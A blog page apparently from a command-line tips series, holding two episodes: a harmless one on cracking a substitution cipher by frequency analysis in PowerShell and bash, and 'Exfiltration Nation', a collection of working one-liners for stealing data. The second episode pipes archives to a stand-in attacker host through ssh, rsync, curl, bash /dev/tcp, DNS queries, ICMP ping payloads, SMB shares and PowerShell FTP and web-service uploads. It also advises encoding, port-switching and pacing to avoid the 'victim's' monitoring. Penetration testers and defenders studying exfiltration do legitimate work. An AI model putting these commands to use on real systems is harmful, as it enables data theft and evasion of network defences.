Tuesday, January 24, 2012

Episode #165: What's the Frequency Kenneth?

Tim helps Tim crack the code

Long time reader, second time caller emailer writes in:

I've always been interested in mystery and codes (going back to 'Mystery Club' in 7th Grade), and today I discovered a cool show on History Channel called Decoded. They were talking about cryptography, specifically frequency analysis. I'm not an educator here but just to make sure we're on the same page: frequency analysis is one method of cracking a cipher by calculating how many times a certain cipher letter appears. From there, one can make a best guess on what the most frequent letters are.

Ok anyway, I've been doing some fun cipher puzzles in my spare time and thought about how this could be code. Say we have a document with a cipher text (letters or numbers, separated by a comma or space). Is it possible to write a code to do a frequency analysis on the ciphertext and maybe even replace the cipher with the results? So if the most frequent cipher are 13 and 77, alter the document and replace 13 and 77, with the most common letters E and T, for example.


This type of statistical analysis works better with longer ciphertext. So I created a substitution cipher that produced the following output. For the sake of simplicity, I didn't replace the punctuation and the spaces

"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU? HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.


We can read a file using the command Get-Content (alias cat, gc, type) as we usually do, but let's use a Here-String instead.

PS C:\> $ciphertext = @"
"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU?
HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ
MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-
UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD
UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU
YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU
YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF
TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ
XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP
WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.
"@


The we start a Here-String with @" and close it with the matching "@ pair. Now we have a variable $cipher that contains our text. Next, let's get the frequency of each character used in our ciphertext.

PS C:\> ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc


Count Name
----- ----
90 V
76 U
58 L
55 T
53 O
47 C
31 W
29 E
29 S
28 Z
28 I
27 F
22 M
21 J
19 H
15 D
15 X
13 R
12 Y
10 N
10 K
8 P
4 Q
1 G
1 B
1 A


We start by piping the ciphertext into the Select-String cmdlet where we use the regular expression "[A-Z]" to select each alphabet character individually. The AllMatches switch is used to return all the characters instead of just the first one found. The results are passed down the pipeline into the Group-Object cmdlet (alias group) to give us the count. The NoElement switch (shortened to noel) is used to discard the original objects as we don't need them in the output.

Let's save the letters into a variable so we can use it later for substitution.

PS C:\> $cipherletters = ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc | % { $_.Name }

PS C:\> $cipherletters
V
U
L
T
O
C
W
...


We used the same command as above, except with the added ForEach-Object cmdlet (alias %) where the value of the Name property is output and stored in our variable.

Now that we have our letters sorted by their frequency we need to compare them with the statistic frequency of characters in the English language.

e  12.702%
t 9.056%
a 8.167%
o 7.507%
i 6.966%
n 6.749%
s 6.327%
h 6.094%
r 5.987%
d 4.253%
l 4.025%
c 2.782%
u 2.758%
m 2.406%
w 2.360%
f 2.228%
g 2.015%
y 1.974%
p 1.929%
b 1.492%
v 0.978%
k 0.772%
j 0.153%
x 0.150%
q 0.095%
z 0.074%


We aren't going to worry about the percentages and we'll just get the letters in order. Later we'll map the two data sets together for our replacement.

PS C:\> $freqletters = "e","t","a","o","i","n","s","h","r","d","l","c","u",
"m","w","f","g","y","p","b","v","k","j","x","q","z"


Now for a quick substitution.

PS C:\> $replacedtext = $ciphertext
PS C:\> for ($i=0; $i -lt 26; $i++) { $replacedtext = $replacedtext -creplace
$cipherletters[$i], $freqletters[$i] }


We use a For loop to count from 0 to 25 where $i is used as the iterator. The iterator is used to match the Nth item in each array (remember, base zero) and use the mapped characters for replacement. The CReplace operator is used for a case sensitive replacement as our cipher letters are upper case and our clear text letters are lower case. This is done to prevent double substitution.

Now to see what our output looks like.

PS C:\> $replacedtext
"phot wokel uic thank uic ron anyent o fiid raghes av uic hoye ni ejgestale an the lcbzert?
woube uic ron, bct at'l nit tessabmu makemu. awofane hip uic picmd seort av uics dirtis timd
uic "uic hoye oggendaratal, o daleole thot al mave-thseotenanf av nit tseoted. pe hoye o tawe-
telted rcse thot rcsel 99% iv omm gotaentl path ni nitareobme lade-evvertl, bct a'w nit fianf
ti faye uic thot: a'w fianf ti faye uic o nep ejgesawentom tseotwent wu riclan dseowed cg molt
peek. ni, wu riclan hol ni wedarom tsoananf. ni, a hoye ni eyadenre thot the nep tseotwent
pamm pisk, ond at'l neyes been telted is onomuqed an degth -- bct a'w fianf ti faye at ti uic
onupou berocle wu riclan thankl at al fiid ltcvv." uic'd vand onithes dirtis, a hige. sotainom
geigme meoye wedarom rose ti the wedarom ejgestl. the wedarom ejgestl hoye o wcrh bettes tsork
serisd thon the xcorkl."
-- doyad pofnes ghd, lra.rsugt, 19th irt 02.


Well, that isn't great. It looks like the only words successfully decryted are "the" and "been". There are a few more techniques for cryptanalysis of this type of cipher

With a bit of tweeking and adjustment of the frequency letters we can end up with the following.

"What makes you think you can invent a good cipher if you have no expertise in
the subject? Maybe you can, but it's not terribly likely. Imagine how you would react
if your doctor told you "You have appendicitis, a disease that is life-threatening if
not treated. We have a time-tested cure that cures 99% of all patients with no
noticeable side-effects, but I'm not going to give you that: I'm going to give you a
new experimental treatment my cousin dreamed up last week. No, my cousin has no
medical training. No, I have no evidence that the new treatment will work, and it's
never been tested or analyzed in depth -- but I'm going to give it to you anyway
because my cousin thinks it is good stuff." You'd find another doctor, I hope.
Rational people leave medical care to the medical experts. The medical experts have a
much better track record than the quacks."
-- David Wagner PhD, sci.crypt, 19th Oct 02.


Let's see if Hal is a better cracker than I am.

Hal gets cracking

Gah. I was always terrible at these puzzles as a child. Maybe my shell can help!

Getting the frequency counts is just a matter of piling up a bunch of shell primatives:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr

90 V
76 U
58 L
55 T
53 O
...

Notice there's two substitutions in the sed program. The first eliminates anything that's not an uppercase letter. The second puts a newline after each letter in the remaining text. So what I get is each letter from the input text on a line by itself.

Unfortunately, sed doesn't give me a good way to deal with the newlines in the original message. So after the last letter on each line I'm going to get the newline I add with sed, followed by the newline from the original input file. This gives me blank lines in the sed output and I don't want them! The next grep in the pipeline takes care of only giving me the lines that have letters on them.

From there I sort my output and then use "uniq -c" to count the occurrences of each letter. The final "sort -nr" gives me the counts in descending order.

Now let's add a little awk:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr | awk 'BEGIN {ORS = ""} {print $2}'

VULTOCWSEZIFMJHXDRYNKPQGBA

The awk I've added prints out the letters from my frequency chart. Normally awk would print them out one per line, just like they are in the input. But in the BEGIN block I'm telling awk to use the null string as the "output record separator" (ORS) instead of the usual newline. That gives me the letters all on one line without any whitespace.

Why is this useful? Because now I can do this:

$ cat cyphertext | tr $(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' |
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}') \
etaoinshrdlcumwfgypbvkjxqz

"prot wokel uic trank uic hon anyent o giid hafres av uic roye ni ejfestale an tre
lcbzeht? woube uic hon, bct at'l nit tessabmu makemu. awogane rip uic picmd seoht av
uics dihtis timd uic "uic roye offendahatal, o daleole trot al mave-trseotenang av nit
tseoted. pe roye o tawe-telted hcse trot hcsel 99% iv omm fotaentl patr ni nitaheobme
lade-evvehtl, bct a'w nit giang ti gaye uic trot: a'w giang ti gaye uic o nep
ejfesawentom tseotwent wu hiclan dseowed cf molt peek. ni, wu hiclan rol ni wedahom
tsoanang. ni, a roye ni eyadenhe trot tre nep tseotwent pamm pisk, ond at'l neyes been
telted is onomuqed an deftr -- bct a'w giang ti gaye at ti uic onupou behocle wu
hiclan trankl at al giid ltcvv." uic'd vand onitres dihtis, a rife. sotainom feifme
meoye wedahom hose ti tre wedahom ejfestl. tre wedahom ejfestl roye o wchr bettes
tsohk sehisd tron tre xcohkl."
-- doyad pognes frd, lha.hsuft, 19tr iht 02.

What I did there was take my pipeline and put it inside "$(...)" so that the output of the pipeline becomes the first argument to my tr command. The letters in the list produced by my pipeline get replaced in with the letters in the standard English frequency chart.

Unfortunately, as Tim found out, the standard frequency chart doesn't work. Actually, my results are different from Tim's first attempt. I think he was cheating some where to get his "the"'s decoded correctly!

If at first you don't succeed, try, try again. We could just keep trying different permutations of our frequency list:

$ freqlist=$(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}')

$ permute etaoinshrdlcumwfgypbvkjxqz |
while read replace; do
misspell=$(cat cyphertext | tr $freqlist $replace | spell | wc -l);
[[ $misspell -lt 10 ]] && echo $replace && break;
(( $((++c)) % 1000 )) || echo -n . 1>&2;
done

First I assign the frequency analysis of my cyphertext to a variable so I don't have to keep recomputing it.

Next I cheat a whole lot by using a script I wrote a long time ago called permute that produces a list of all possible permutations of its input. My while loop reads those permutations one at a time and tries them via tr. The output of tr goes into spell which will give a list of the misspelled words. I count the number of misspelled words with "wc -l". If the number of misspellings is small, then I've probably found the right replacement list. In that case I'll output the $replace list that seems to work and terminate the loop with break.

The last line of the loop is the trick I showed you in Episode #163 for showing progress output in a loop. Every 1000 permutations tried, we'll output a dot just so you know that things are working.

Be prepared for a lot of dots, however. Unfortunately there are 26! = 4E26 possible permutations, which might take you-- or your computer-- more than a little while to test. Brute force really isn't a practical solution for this problem. But I wanted to show you that there is a solution that you could implement in shell (modulo my dirty little permute script), even if it is a lousy one.

Tuesday, January 10, 2012

Episode #164: Exfiltration Nation

Hal pillages the mailbox

Happy 2012 everybody!

In the days and weeks to come, the industry press will no doubt be filled with stories of all the high-profile companies whose data was "liberated" during the past couple of weeks. It may be a holiday for most of us, but it's the perfect time for the black hats to be putting in a little overtime with their data exfiltration efforts.

So it was somehow appropriate that we found that loyal reader Greg Hetrick had emailed us this tasty little bit of command-line exfiltration fu:

tar zcf - localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"

Ah, yes, the old "tar over SSH" gambit. The nice thing here is that no local file gets written, but you end up with a perfect directory copy over on "remotehost.evil.com" in a target directory of your choosing.

If SSH is your preferred outbound channel, and the local system has rsync installed, you could accomplish the same mission with fewer keystrokes:

rsync -aH localhost remotehost.evil.com:/some/path/name

If outbound port 22 is being blocked, you could use "ssh -p" or "rsync --port" to connect to the remote server on an alternate port number. Ports 80 and 443 are often open in the outbound direction when other ports are not.

But what if outbound SSH connections-- especially SSH traffic on unexpected port numbers-- are being monitored by your victim? Greg's email got me thinking about other stealthy ways to move data out of an organization using only command-line primitives.

My first thought was everybody's favorite exfiltration protocol: HTTPS. And nothing makes moving data over HTTPS easier than curl:

tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php

"curl -F" fakes a form POST. In this case, the submitted parameter name will be "data". Normally you would use "@filename" after the "data=" to post the contents of a file. But we don't want to write any files locally, so we use "@-" to tell curl to take data from the standard input.

Of course, you'd also have to create script.php over on the remote web server and have it save the incoming data so that you could manually unpack it later. And, while it's commonly found on Linux systems, curl is not a built-in tool. So strictly speaking, I'm not supposed to be using it according to the rules of our blog.

So no SSH and now no curl. What's left? Well, I could just shoot the tarball over the network in raw mode:

tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443

"/dev/tcp/remotehost.evil.com/443" is the wonderful bash-ism that allows me to make connections to arbitrary hosts and ports via the command-line. Note that because the "/dev/tcp/..." hack is a property of the bash shell, I can't use it as a file name argument to "tar -f". Instead I have to use redirection like you see in the example.

Maybe my victim is doing packet inspection. Perhaps I don't want to just send the unobfuscated tarball. I could use xxd to encode the tarball as a hex dump before sending:

tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443

You would use "xxd -r" on the other end to revert the hex dump back into binary.

Instead of xxd, I could use "base64" for a simple base64 encoding. But that might be too obvious. How about a nice EBCDIC encoding on top of the base64:

tar zcf - localfolder | base 64 | dd conv=ebcdic >/dev/tcp/remotehost.evil.com/443

Use "dd conv=ascii if=filename | base64 -d" on the remote machine to get your data back. I'm guessing that nobody looking at the raw packet data would suspect EBCDIC as the encoding though.

Doing something like XOR encoding on the fly turns into a script, unfortunately. But there are some cool examples in several different languages (including the Unix shell and Windows Powershell) over here.

Or how about using DNS queries to exfiltrate data:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do host $line.domain.com remotehost.evil.com; done

Once again I'm using xxd to encode my tar file as a hex dump. I read the hex dump line by line and use each line of data as the "host name" portion of a DNS query to my nameserver on remotehost.evil.com. By monitoring the DNS query traffic on the remote machine, I can reassemble the encoded data to get my original file content back.

Note that I've added the '-c 16" option to the xxd command to output 16 bytes (32 characters) per line. That way my "host names" are not flagged as invalid for being too long. You might also want to throw a "sleep" statement into that loop so that your victim doesn't become suspicious of the sudden blast of DNS queries leaving the box.

I could so something very similar using the ping command on Linux to exfiltrate my data in ICMP echo request packets:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do ping -p $line -c 1 -q remotehost.evil.com; done

The Linux version of ping lets me use "-p" to specify up to 16 bytes of data to be included in the outgoing packet. Unfortunately, this option may not be supported on other Unix variants. I'm also using "-c 1" to send only a single instance of each packet and "-q" to reduce the amount of output I get. Of course, I'd have to scrape the content out of the packets on the other side, which will require a bit of scripting.

Well, I hope that gets your creative juices flowing. There's just so many different ways you can obfuscate data and move it around the network using the bash shell. But I think I better stop here before I make Tim cry. Now Tim, stop your sobbing and show us what you've got in Windows.

Tim wipes away his tears

I asked Santa for a few features to appear in Windows that are native to Linux, but all I got was a lump of coal. I keep asking Santa every year and he never writes back. I know people told me he doesn't exist, but HE DOES. He gave me a skateboard when I was 7. So yes, my apparent shunning by Santa made me cry.

I've got no built in commands for ssh, tar, base64, curl/wget, dev tcp, or any of the cool stuff Hal has. FTP could be used, and can support encryption, but you have to write a script for the FTP command (similar to this). While PowerShell scripts could be written to implement most of these functions, that would definitely cross into The Land of Scripts (and they have a restraining order against us, something about Hal not wearing pants last time he visited).

That pretty much leaves SMB connections and that has a number of problems. First, we don't have encryption, which may mean we can't use it on a Pen Test. Second, port 445 is usually heavily monitored or filtered. Third, we can't pick a different port and we are stuck with 445.

On the bright side it means that my portion of this episode is going to be short. First, we create the connection back to our server.

C:\> net use z: \\4.4.4.4\myshare myevilpassword1 /user:myeviluser


Then we can copy all the files we want to the Z. drive. We can accomplish this using Robocopy or PowerShell's Copy-Item (aliases copy, cp, and cpi) with the -Recurse switch.

Yep, that's it. Now back to my crying. Oh, and Happy Stinking New Year.

Edit: Marc van Orsouw writes in with the following
Some remarks about PowerShell options :

Of course you do not need the net use in PowerShell you can use UNC directly.
And there are a lot of options in your wishlist that can be done using .NET (mostly resulting in scripts on oneliners of course, so keep your list ;), although PSCX will solve a lot of them)

Some options I came up with :

A IMHO opinion another cool option is using PowerShell remoting (already encrypted)

This could be as easy as :

Invoke-Command -ComputerName evilserver {PARAM($txt);set-content stolen.txt $txt} -ArgumentList (get-content usernames.txt)

Some Ugly FTP example with Base64

[System.Net.FtpWebRequest][System.Net.WebRequest]::Create('ftp://evil.com/p.txt') |% {$_.Method = "STOR";$s = [byte[]][convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\username.txt')).tochararray();$_.GetRequestStream().Write($s, 0, $s.Length)}

And with Web service when remote server available (as in the PHP example) than it would be as simple as :

(New-WebServiceProxy -uri http://evil.com/store.asmx?WSDL).steal((get-content file.txt))


We can just use the UNC path (\\1.1.1.1\share instead of z:\) for exfiltration, but if we want to authenticate the best way is to use NET USE first.

The PowerShell Community Extensions (PSCX) do give a lot of cool functionality, but they are add-ons and not allowed. Similarly, the .NET framework gives us tremendous power, but crosses into script-land rather quickly and is also not allowed.

The remoting command is really cool *and* it is encrypted too. I forgot about this one. The New-WebServiceProxy cmdlet is a really intriguing way to do this as well. I have never used this cmdlet before, and if we use HTTPS instead of HTTP it would be encrypted too. Very nice!

Edit 2: Marc van Orsouw has another cool suggestions
PS C:\> Import-Module BitsTransfer
PS C:\> Start-BitsTransfer -Source c:\clienttestdir\testfile1.txt -Destination https://server01/servertestdir/testfile1.txt
-TransferType Upload -cred (get-credential)


Mark is a PowerShell MVP and blogs over at http://thepowershellguy.com/